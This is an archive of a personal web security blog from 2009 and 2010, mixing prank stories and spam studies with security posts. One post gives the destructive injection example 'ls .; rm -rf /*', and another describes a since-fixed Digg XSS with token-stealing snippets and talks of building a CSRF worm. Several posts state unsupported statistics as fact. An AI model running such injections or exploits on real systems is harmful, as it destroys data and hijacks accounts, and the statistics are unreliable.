Human_Bagel http://beta.humanbagel.com/blog/ Human_Bagel's Web Security Blog\r\n <![CDATA[ The Story of Human Bagel ]]> 2010-08-13 15:08:16

I am commonly asked the origin of the name "Human Bagel."

Until now, I wanted to leave it as a mystery, but the overwhelming number of you that want to know should be told- I suppose.

It all started back in 2004, I was an evil high schooler looking to do some evil things to the school network. It was to be my first righteous hack.

There was one problem- I needed a handle. I wanted to identify myself without my own name.

Enter the video game. Unreal Tournament 2003. I was painfully addicted to this game at this time.

There was one problem with it, the speakers on that old windows 2000 computer were shot. Me and my brother would leave the sound on and try to understand what the bots were saying.

One in particular stood out, we never found out what they were trying to say, but through the blown speakers, it sounded exactly like "Die Human Bagel." My brother proposed that handle, and its been with me ever since. ]]> http://humanbagel.com/blog/The+Story+of+Human+Bagel http://humanbagel.com/blog/The+Story+of+Human+Bagel <![CDATA[ The Cupcake Paradigm Part II ]]> 2010-07-31 12:07:16
Yes- Yes, the position of a cupcake can be used to induce a bad decision.

The names of the (psuedo) innocent have been changed for this story.

A month after the original cupcake paradigm was released, I began to formulate a plan. I wanted to see how psychologically powerful the draw of cupcake position was.

So- I hatched a plan. I searched far and wide for commercial cupcakes with foil wrappers that actually conduct electricity. Store clerks were indeed confused as to why I was testing their cupcakes with an ohmeter, but it was critical that the foils resistance was low.

Finally, at a local King Supers, I located a tray of 16 pink cupcakes with foil wrappers. The foil conducted electricity adequately and I was ready.

I acquired a DC transformer from a discarded mobile phone charger, a 9v battery connector and a spool of wire from a local Radio Shack.

I was ready to launch my plan. I connected the battery and wires to the transformers, and touched the outgoing contacts- the electrical shock was sufficient to make me jump, and think twice about the ethics of my experiment. I decided, however, that science- and humor must go on.

I bifurcated the foil wrapper, carefully separating it vertically. I then attached the contacts to the wires, and promised a lunch in exchange for a friend testing it (the lunch was delicious).

I strategically placed the shocking wires and unit in such a way that anyone could clearly see that the cupcake was electrified.

I placed the electric cupcake in the number one position and went to watch.

45 minutes later, Chuck came in and attempted to acquire that cupcake. He seemed oddly surprised that the cupcake shocked him, and tried again. Finally, he settled on the number five position cupcake.

20 minutes passed and another came to the tray. He observed the wires for a moment, and tried for the cupcake. He was shocked and recoiled his hand. Then he tried again. And again. And again. Charley tried no less than seven times before walking away disgruntled.

Each of the six people that approached the tray observed the wires and still tried for the electric cupcake. Most of them tried twice for reasons unknown before settling on another cupcake. Only one person walked away.

What can we learn from this? I think that the second installment of the Cupcake Paradigm teaches us that the position and possible aggressive nature of a cupcake makes it overwhelmingly desirable.

It is obvious that weather by the position, or curiosity, the electric cupcake fared amazingly compared to its non-electric counterparts.

The other lesson I learned is that I am no longer permitted to bring cupcakes home. Ever. ]]> http://humanbagel.com/blog/The+Cupcake+Paradigm+Part+II http://humanbagel.com/blog/The+Cupcake+Paradigm+Part+II <![CDATA[ What does real hacking look like? ]]> 2010-07-27 02:07:10
We all know what hacking looks like on TV, epic 3D realms, police chases, spiffy colored screens, and exciting battles with network admins. It looks more like geometry wars than development.

If this was what hacking was like, it would be a much more popular hobby.

The sad reality is that hacking involves more tedium and left over Chinese food than anything else.

So, let me walk you through a typical hacking experience.

I decide I'm going to hack XYZ, inc, a web hosting service.

First, I'd run a lot of scans, looking for open ports, trying to guess the operating system and services installed on the servers, and looking for known exploits.

The heart of hacking is the exploit. An exploit is effectively a bug in software that can be leveraged to do something malicious. For example, if I have a program that returns the output from a directory list command "ls " a hacker may input ".; rm -rf /*" which would make the executed code "ls .; rm -rf /*" Deleting everything allowed on the server.

There are many hundreds of types of exploits, but they are all essentially bugs in software that can be leveraged maliciously.

So, how does a hacker find one? Well, after running a plethora of scans, he will go through each and every service, one by one, trying dozens of inputs, trying to get an error message.

Hackers get excited about error messages- it means they found a bug. Once an error is found (even though they don't always display an error message) the hacker will expand on that, trying to do... anything. Eventually, he may just get some remote code execution, or privilege escalation, or something fun.

The sad reality of the hacker is hours upon hours of looking at error messages and taking educated guesses as to what to try next.

In general, hackers are little more than very good programmers who got bored. The image of some 14 year old in his mothers basement hacking the NSA is pretty uncommon, its usually a young professional, or a seasoned developer that wanted to have a little more fun.

It should be noted, however, that the hours or days of tedium, scans, waiting, and thinking with no certainty of getting anywhere is not fun to most people.

The more interesting thing is the reasoning behind the hacker. Well over 95% of people convected of computer crimes have an intellect considered "very bright" or higher. 80% have diagnosed psychological conditions, with major depressive disorder, bipolar disorder, and thought disorders (delusions, paranoia, hallucinations) being common.

The simple answer to "why?" is not so simple. Every hacker has their own reasons, although from my experience of communicating with then, a disdain for society in general and boredom seem to top the list. ]]> http://humanbagel.com/blog/What+does+real+hacking+look+like%3F http://humanbagel.com/blog/What+does+real+hacking+look+like%3F <![CDATA[ The single greatest threat to internet security ]]> 2010-07-19 23:07:57
They are not relevant, useful, or even respectful. They are often misleadingly malicious, utilizing fake user interfaces to confuse the unsavy crowd.

These flash advertisements are the number one greatest threat to the security of end users everywhere, and by extension, the entire internet.

Not only to they mislead, scam, and confuse, but they often utilize exploits in Internet Explorer to install malware on victims computer.

90% of malware on computers is from flash advertisements, the huge majority slipping through Internet Explorer's weak security.

This is so profound, that most users, when armed with Firefox and Adblock plus (an ad blocking software) don't even need an anti virus program installed on their computer.

Now- lets level here. I know why admins do it. Websites are expensive, they require domain names, development, hosting, and a lot of time to make a successful website, so admins feel they deserve their cut. They try and get this from paid flash advertisements.

But, for the tempted, here are a few statistics:
  • Flash advertisements increase a pages bounce rate more than 75%
  • On average, one page with flash advertisements will infect 5% of the users that see it, often more.
  • When asked about the most annoying part of web surfing, the number one answer is "flash advertisements"


Usually, the revenue from flash advertisements is much lower than contextual text advertisements from Google or Yahoo.

For me, no ad revenue will be made from me until this situation improves, for me its FireFox and Adblock Plus ]]> http://humanbagel.com/blog/The+single+greatest+threat+to+internet+security http://humanbagel.com/blog/The+single+greatest+threat+to+internet+security <![CDATA[ Spam Study Part II: Prevention ]]> 2010-05-09 20:05:23 I have proven some more relevant data:
1) Most spam bots are "all purpose" bots. Meaning that they will search for email addresses to spam, search for forms to spam, and look for known exploits on a website to sell.

2) Spam bots are stupid.

So, what do we do about it?

I propose a two channel method: Defense and offense.

Defense
There are countless ways to prevent spam. My personal favorite is to require JavaScript to complete the form. By this I mean, use JavaScript to change the "action" attribute of the form from a fake file to a real one on load, and if JavaScript is not enabled, inform the user that JavaScript is required, or default to a standard CAPTCHA.

Offense
It is not often that we can directly attack spam bots, or spammers themselves. I propose a simple solution: Let them gorge themselves on email addresses registered to known spammers.

Spam bots work by looking on every website for anything formatted like an email address, they then test the address to make sure it works and add it to a database. The database is then sold to the highest bidder.

So, deciding that this is totally not cool, I wrote a simple script that will provide spammers with all the email address they want- up to half a million of them.

One problem for them, these are all known spammer email addresses.

They will think they just scored 500,000 email addresses, but they will only be spamming themselves.

Download Spammer Jammer Script ]]> http://humanbagel.com/blog/Spam+Study+Part+II%3A+Prevention http://humanbagel.com/blog/Spam+Study+Part+II%3A+Prevention <![CDATA[ The Cupcake Paradigm ]]> 2010-02-11 22:02:22
Living in a household with numerous roommates, food items tend to appear and disappear by the minute. Recently, a tray of cupcakes appeared (thanks, Karma) and I observed them disappear over the next day.

I started noting geometric patterns with which the cupcakes would be consumed.

Color, placement, and little plastic ring style determined their rate of consumption. For example, the red cupcakes went much faster than the purple ones. Also, the cupcakes with no plastic ring went first. I was fascinated with how I could accurately (~85% accuracy) identify the next cupcake to go.

Still, I had far too many variables for a proper study.

Intrigued, I purchased another tray of cupcakes, this time each having the same color. I then carefully noted the order in which they were eaten:

13141516
12589
11236
10147


Repeating the experiment with bottles of soda, cookies, pens, packages of ramen noodles, "I am loved" pins, and forks, I started to notice that the original cupcake experiment was statistically representative of the overall pattern.

So, expanding on the pattern, I paired high value items (cup cakes) with low value items (packages of ramen noodles), and notices that even when the low value items were placed in high-value positions(1,2,3, and 4), they were still consumed first. Even though when placed side by side, one-by-one, the cupcakes were always taken first.

My studies continue, as I try to derive a function from the movement, such that clients may improve the sales of less popular items, simply by their position on the page.

So, my next step is to set up a study website, perhaps dealing with free cupcakes, to test this theory online, with a much larger sample size.

I may also study if placement can be used to induce a bad decision, such as attempting to acquire an obviously electrified cupcake.

Results to follow. ]]> http://humanbagel.com/blog/The+Cupcake+Paradigm http://humanbagel.com/blog/The+Cupcake+Paradigm <![CDATA[ Microsofts attack on humanity ]]> 2010-01-16 15:01:50
This is an interesting topic in its self, but I want to talk about the security exploit used, the 0-day exploit, "Aurora," used against Microsoft Internet Explorer that caused this whole fiasco.

Yet again IE screws up big time. Why Google employees were using IE is beyond me, but it highlights just another disaster caused by the buggy IE.

This is far from the first time that IE has caused a massive security breach. Toshiba, IBM, and AIG have all been high profile victims of IEs miserable security.

I know many people that use IE for the sole reason of "its the default, so it must be good" and many businesses that will not upgrade to a better browser due to the costs of installing an alternative browser on workstations. I may propose, however I propose an alternative view. How much does a massive security breach cost, versus the cost of upgrading to a better browser?

I know security consultants that manage multi-million dollar projects to secure massive networks, and yet still let the Windows 2000 work stations run Internet Explorer 6, which will yield a security vulnerability if you look at it angrily enough.

Everyone, grow up and get a better browser. ]]> http://humanbagel.com/blog/Microsofts+attack+on+humanity http://humanbagel.com/blog/Microsofts+attack+on+humanity <![CDATA[ Spam Study ]]> 2009-12-03 02:12:21
So, I set up a spam trap. A fake comment form rigged to collect data, here are the results.

1) These bots found my comment form via a robots.txt Disallow statement, or via a rel="nofollow" link, meaning they intentionally look for things that web developers don't want scanned.

2) Only one out of the nearly 2,000 spammers had JavaScript enabled.

3) All of the spammers had cookies enabled.

4) Spammers will put a test post first, containing different formatting methods for links, when it determines which one works, it returns with spam in that format (HTML, BBcode, etc).

5) The bot will attempt to locate the posted spam, presumably for future refrence.

6) None of the spammers activated an onfocus, onclick, onkeypress, onmousemove, or any other event with the exception of onload.

From this data, I devised a very simple method to stop comment spam without CAPTCHAs. Require JavaScript, and require a focus event. Those two should prevent all but the most determined customized comment spammers.

For my next study, I will collect data about email harvesters, and try and correlate specific spam to a specific spambot by delivering a different email address to each bot, and logging the data. My hope is to make specific correlations about certain businesses that are using email harvesters, and hopefully deduce some of the businesses that are selling email lists from random email harvesting.

Until then, ciao.

]]> http://humanbagel.com/blog/Spam+Study http://humanbagel.com/blog/Spam+Study <![CDATA[ An open letter to banking institutions ]]> 2009-11-27 19:11:05
Please stop putting absurd restrictions on password length or permitted characters.

Recently, I changed banks, from who to who will remain private, but suffice it to say that I have now experienced three separate banking websites.

In each case, the password length was restricted to less than 10 characters, and only permitted alphanumeric characters, in other words, a-z, A-Z, and 0-9.

One particularly bad case, the password was limited to 7 alphanumeric characters, with a minimum of 5.

There is absolutely no logical reason to limit character limit, or the character set for that matter.

Allow me to explain. When a password is stored, any security professional on the planet will tell you to hash your passwords. This means a one-way encryption, that can be checked against your input, so that even if the database was exposed, the passwords would be secure.

Any hash can take any length of input, and return the same length of hash. For example, if I use the MD5 hash on the phrase "The quick brown fox jumped over the lazy dog," or "A," the returned length will always be 32. So, space is no reason not to allow long passwords.

All hashes take the input and return a fixed-length output using only 16 characters, 0-9 and A-F. So, if all input, no matter what it is, is returned in a fixed-length string made of predictable characters, there is no reason to reject any character as input, or to be overly cautious, allow every character on the US keyboard.

Why is this so important?

Well, if we know that there is a maximum length of 7, a minimum length of 5, and made of a specific character set (a-z, A-Z, and 0-9), a brute-force attack just became very, very simple.

Granted, these websites have a set number of tries before the system locks up, but this can be possibly circumvented. What if a rogue employee with no such restriction were to launch the attack? What if some exploit were to bypass the lock down? What if the password table were somehow dumped or leaked? All the passwords would be very, very vulnerable.

Ok, lets give the bank the benefit of the doubt, and say they use the Whirlpool hash, arguably one of the strongest, and they use a very nice salt, which is always a good practice.

Well, if the lock down were circumvented by a local employee or hacker, these safe guards would be useless, but for the sake of argument, lets say just the password hash table was dumped.

Well, the salt is not difficult to find, just try a handful of common passwords, and crack the salt. Bingo, we have salt.

Now, its just a matter of running a very simple brute force attack against the theoretical table, and with a character set so small, and such a defined size, every single password could be cracked on an average laptop in less than 5 days.

So, I implore all of the banking institutions to ease the needless restrictions on password length and characters. ]]> http://humanbagel.com/blog/An+open+letter+to+banking+institutions http://humanbagel.com/blog/An+open+letter+to+banking+institutions <![CDATA[ Automatic Digg Hack ]]> 2009-09-18 17:09:07 AutoStumbler I bring you the AutoDigger!

I reported the issue, and it has been corrected, meaning I get to publish!

The exploit works on the same principle as before, a common XSS keyhole located in the search engine allows for automatic submission of the "Digg It" action.

Granted, the code I made for this exploit was much nicer than before. Based on AJAX as opposed to iframes, and used referrer spoofing in the AJAX headers.

The exploit works like this:
In the search engine on digg.com, a developer forgot to escape the query inside of a script block, so, an injection of
can get easy remote JavaScript inclusion.

WooHoo, now for the fun part, the JavaScript.

First, I need to get the token, luckally, its on the home page when a user is logged in. Just have to extract it. Just make an AJAX request to the home page using their own api, and run something like this:
var token = ajax.match(/[a-f0-9]{32}/)[0];
There! We have our security token!

Now, we just need two pieces of information, the itemID and the location. This is easy enough to get, use FireBug to watch a Digg request. Copy the itemID and the location.

Now, all we have to do is craft the request and send it.

We can use digg.com's built in digg() function. Pretty much used like this:
digg(itemID,location);
Done.

Now, you might ask, "Why did you get the token if it was not needed for AutoDigging?"

Good question, but I have my sights on something more valuable than getting something on the home page.

I want CSRF or an AJAX worm. The token is the key to that. With AJAX and the token, you can do almost any user action with a little know-how. Edit the profile, set favorites, anything. Quite beautiful, I think. ]]> http://humanbagel.com/blog/Automatic+Digg+Hack http://humanbagel.com/blog/Automatic+Digg+Hack